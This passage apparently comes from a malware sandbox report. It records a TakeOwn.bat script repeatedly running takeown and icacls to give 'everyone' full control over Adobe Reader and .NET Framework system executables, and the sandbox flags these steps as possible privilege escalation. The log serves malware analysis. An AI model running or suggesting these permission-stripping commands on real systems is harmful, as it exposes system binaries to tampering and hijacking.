C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe"3⤵
-
-
